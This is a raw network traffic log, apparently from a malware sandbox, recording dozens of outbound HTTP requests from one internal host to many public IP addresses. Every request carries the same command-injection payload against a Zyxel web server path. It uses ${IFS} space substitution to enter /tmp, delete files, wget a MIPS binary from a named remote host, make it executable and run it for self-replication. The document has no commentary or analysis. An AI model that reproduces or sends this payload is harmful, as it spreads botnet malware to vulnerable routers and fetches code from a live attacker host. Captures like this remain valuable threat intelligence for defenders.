                                        Jan 14, 2024 16:18:50.585330963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5718192.168.2.1345968103.186.95.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585352898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5719192.168.2.1334680217.178.80.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585396051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5720192.168.2.135492645.152.147.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585438967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5721192.168.2.135652648.181.143.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585464001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5722192.168.2.135813642.26.17.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585517883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5723192.168.2.1342654204.174.101.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585545063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5724192.168.2.1339688111.237.160.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585588932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5725192.168.2.1355988126.135.188.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585623980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5726192.168.2.13420589.23.122.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585679054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5727192.168.2.1350772103.121.121.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585702896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5728192.168.2.134706897.126.41.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585742950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5729192.168.2.1360080147.146.16.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585791111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5730192.168.2.134787068.120.175.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585819960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5731192.168.2.1352578208.158.237.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585865974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5732192.168.2.1359846141.93.91.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585906982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5733192.168.2.1336062201.113.81.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585946083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5734192.168.2.1349990150.62.152.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585969925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5735192.168.2.1336380203.39.48.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586025000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5736192.168.2.135303275.89.124.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586061954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5737192.168.2.134061261.48.32.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586091995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5738192.168.2.1349836168.86.34.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586148024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5739192.168.2.1341350130.83.217.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586184025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5740192.168.2.1337736102.245.16.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586221933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5741192.168.2.1333200122.52.179.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586251974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5742192.168.2.1350432123.184.92.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586292028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5743192.168.2.134432482.139.243.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586321115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5744192.168.2.1349386219.233.171.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586364031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5745192.168.2.1346926145.148.82.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586393118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5746192.168.2.134072085.183.46.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586420059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5747192.168.2.1351626115.4.148.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586464882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5748192.168.2.1341528120.150.79.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586513996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5749192.168.2.135350419.52.199.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586563110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5750192.168.2.134303445.223.240.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586627007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5751192.168.2.1333390181.30.113.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586668015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5752192.168.2.1339476151.1.42.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586716890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5753192.168.2.1341512102.50.97.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586767912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5754192.168.2.13368421.130.35.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586793900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5755192.168.2.134107846.233.76.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586867094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5756192.168.2.133494042.117.157.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586895943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5757192.168.2.1351648195.20.214.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586926937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5758192.168.2.1334666178.33.36.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.586983919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5759192.168.2.133879413.227.220.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587013006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5760192.168.2.134063863.223.136.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587047100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5761192.168.2.1360226123.210.177.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587099075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5762192.168.2.134480287.185.75.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587151051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5763192.168.2.1338934150.138.217.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587189913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5764192.168.2.1358662115.89.23.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587222099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5765192.168.2.134350491.162.104.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587268114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5766192.168.2.135941062.114.219.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587311983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5767192.168.2.1335120105.56.221.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587357044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5768192.168.2.1356462110.245.101.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587405920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5769192.168.2.1355410108.239.91.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587415934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5770192.168.2.1358754155.155.249.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587471962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5771192.168.2.133814279.123.145.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587505102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5772192.168.2.1353664216.68.144.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587551117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5773192.168.2.1341274182.27.13.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587584972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5774192.168.2.1343280106.148.73.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587615013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5775192.168.2.133551060.5.143.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587665081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5776192.168.2.1359108144.107.48.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587707043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5777192.168.2.1354356216.152.154.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587762117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5778192.168.2.1359222169.154.60.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587807894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5779192.168.2.1356996190.72.87.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587843895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5780192.168.2.1334152196.176.165.206443
                                        TimestampBytes transferredDirectionData
